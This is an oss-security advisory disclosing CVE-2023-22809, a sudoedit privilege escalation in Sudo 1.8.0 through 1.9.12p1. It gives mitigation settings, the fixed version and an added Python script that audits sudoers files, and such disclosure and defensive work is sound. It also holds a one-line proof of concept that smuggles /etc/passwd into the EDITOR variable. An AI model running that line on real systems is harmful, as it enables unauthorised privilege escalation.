List:       oss-security
Subject:    [oss-security] CVE-2023-22809: Sudoedit can edit arbitrary files
From:       Matthieu Barjole <matthieu.barjole () synacktiv ! com>
Date:       2023-01-19 0:33:43
Message-ID: CAE-GootkXskaRKTmdPg1KsL3cm2oPq8DtL14MoupwX_CaVDeXw () mail ! gmail ! com

Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
when a user is authorized to use it by the sudoers policy. This vulnerability
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1
inclusive.

## Analysis

The technical analysis can be found in the following security advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Concept

Assuming the following sudoers policy:

```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```

Arbitrary files such as `/etc/passwd` may then also be edited, as follows:

```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```

## Mitigation

It is possible to prevent a user-specified editor from being used by sudoedit
by adding the following line to the sudoers file.

```
Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To restrict the editor when editing specific files, a Cmnd_Alias can be used,
for example:

```
Cmnd_Alias          EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD  env_delete+="SUDO_EDITOR VISUAL EDITOR"
user                ALL = EDIT_MOTD
```
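As an added example, not part of the advisory or of the Sudo project, the following Python script audits a sudoers policy for sudoedit rules that lack the env_delete mitigation shown above, and checks a sudo version string against the affected range. The parser is a deliberately simplified, single-file approximation of sudoers syntax: it understands Cmnd_Alias, Defaults!target env_delete lines and plain user specifications, and does not follow @include or @includedir directives.

```python
import re

# Editor variables that sudoedit honours; the mitigation strips exactly these.
EDITOR_VARS = {"SUDO_EDITOR", "VISUAL", "EDITOR"}

def parse_version(ver):
    """Turn a sudo version string such as '1.9.12p1' into a comparable tuple."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", ver.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {ver!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))

def is_affected(ver):
    """Affected range from the advisory: 1.8.0 through 1.9.12p1 inclusive."""
    return parse_version("1.8.0") <= parse_version(ver) <= parse_version("1.9.12p1")

def unprotected_sudoedit_rules(sudoers_text):
    """Return (user, command) pairs that grant sudoedit without a Defaults
    entry deleting all three editor variables for that command or alias.
    Only the given text is inspected; included files are not followed."""
    lines = [l.split("#", 1)[0].strip() for l in sudoers_text.splitlines()]
    lines = [l for l in lines if l]                     # drop comments and blanks
    aliases, protected, findings = {}, set(), []
    for line in lines:                                  # pass 1: aliases and Defaults
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
        m = re.match(r'Defaults(?:!(\S+))?\s+env_delete\s*\+?=\s*"([^"]*)"', line)
        if m and EDITOR_VARS <= set(m.group(2).split()):
            protected.add(m.group(1) or "*")            # '*' = global Defaults
    for line in lines:                                  # pass 2: user specifications
        if line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                            "Host_Alias", "Runas_Alias")):
            continue
        m = re.match(r"(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.+)", line)
        if not m:
            continue
        for entry in (c.strip() for c in m.group(2).split(",")):
            # Covered by a global Defaults, Defaults!sudoedit, or Defaults!<alias>.
            covered = {"*", "sudoedit", entry} & protected
            for cmd in aliases.get(entry, [entry]):     # expand Cmnd_Alias if any
                if cmd.startswith("sudoedit") and not covered:
                    findings.append((m.group(1), cmd))
    return findings

if __name__ == "__main__":
    # Constructed sample policy: the rule from the advisory without the mitigation.
    print(unprotected_sudoedit_rules("user ALL=(ALL:ALL) sudoedit /etc/motd\n"))
```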

## Fix

The issue was fixed in Sudo 1.9.12p2.

## References

[1] https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
